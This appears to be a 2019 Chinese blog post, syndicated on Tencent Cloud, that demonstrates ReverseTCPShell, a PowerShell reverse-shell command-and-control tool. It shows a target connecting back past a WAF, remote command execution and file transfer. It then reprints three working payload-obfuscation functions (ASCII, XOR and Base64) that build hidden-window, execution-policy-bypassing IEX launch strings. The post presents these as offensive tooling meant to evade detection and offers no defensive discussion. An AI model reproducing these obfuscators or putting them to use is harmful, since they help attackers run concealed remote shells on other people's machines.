RedTeam之ReverseTCPShell
大家好啊,我是我们实验室的Mr.赵,几天前,一师傅就在说这个工具,正好,这个工具今天就出来了,我们一起来常常鲜,由于kali已经支持powershell了,这里我们就直接使用kali来演示了。
先奉上原作者的演示视频:
界面简单无比,十分符合老外的个性,ReverseTCPShell C2,正如其名,是一款powershell编写的反弹shell工具,流量经过AES加密,据说可以bypass,上手看看吧。
提供了3种payload的混淆的方式:ASCII、xor、Base64,这里随便选择xor
也是直接给出来了PS下的和CMD下的利用,并监听4444端口
靶机上线,waf无拦截
简单命令执行:
常见的文件上传、下载啥的自然也是可以的
至于实现方式也是很容易就能看出来的,三个函数
ASCLL
function ASCII_Obfuscation($String)
{
$PowerShell = "IEX(-Join((@)|%{[char]`$_}));Exit";
$CMD = "ECHO `"IEX(-Join((@)|%{[char]```$_}));Exit`" | PowerShell -noP -nol -Win hidden -nonI -Exe ByPass `"IEX(IEX(`$input))`"&Exit";
$String = [System.Text.Encoding]::ASCII.GetBytes($String) -join ',';
$PowerShell = Character_Obfuscation($PowerShell);
$PowerShell = $PowerShell -replace "@","$String";
$CMD = Character_Obfuscation($CMD);
$CMD = $CMD -replace "@","$String";
Return $PowerShell,$CMD;
}XOR
function BXOR_Obfuscation($String)
{
$PowerShell = "IEX(-Join((@)|%{[char](`$_-BXOR #)}));Exit";
$CMD = "ECHO `"IEX(-Join((@)|%{[char](```$_-BXOR #)}));Exit`" | PowerShell -noP -nol -Win hidden -nonI -Exe ByPass `"IEX(IEX(`$input))`"&Exit";
$Key = '0x' + ((0..5) | Get-Random) + ((0..9) + ((65..70) + (97..102) | % {[char]$_}) | Get-Random);
$String = ([System.Text.Encoding]::ASCII.GetBytes($String) | % {$_ -BXOR $Key}) -join ',';
$PowerShell = Character_Obfuscation($PowerShell);
$PowerShell = $PowerShell -replace "@","$String";
$PowerShell = $PowerShell -replace "#","$Key";
$CMD = Character_Obfuscation($CMD);
$CMD = $CMD -replace "@","$String";
$CMD = $CMD -replace "#","$Key";
Return $PowerShell,$CMD;
}base64
function Base64_Obfuscation($String)
{
$PowerShell = "IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(([Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes({@})|Sort-Object {Get-Random -SetSeed #}))))));Exit";
$CMD = "ECHO `"IEX([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String(([Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes({@})|Sort-Object {Get-Random -SetSeed #}))))));Exit`" | PowerShell -noP -nol -Win hidden -nonI -Exe ByPass `"IEX(IEX(`$input))`"&Exit";
$Seed = (Get-Random -Minimum 0 -Maximum 999999999).ToString('000000000');
$String = [Text.Encoding]::ASCII.GetString(([Text.Encoding]::ASCII.GetBytes([Convert]::ToBase64String([System.Text.Encoding]::ASCII.GetBytes($String))) | Sort-Object {Get-Random -SetSeed $Seed}));
$PowerShell = Character_Obfuscation($PowerShell);
$PowerShell = $PowerShell -replace "@","$String";
$PowerShell = $PowerShell -replace "#","$Seed";
$CMD = Character_Obfuscation($CMD);
$CMD = $CMD -replace "@","$String";
$CMD = $CMD -replace "#","$Seed";
Return $PowerShell,$CMD;
}唔,那今天就到这里吧..
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-12-16,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
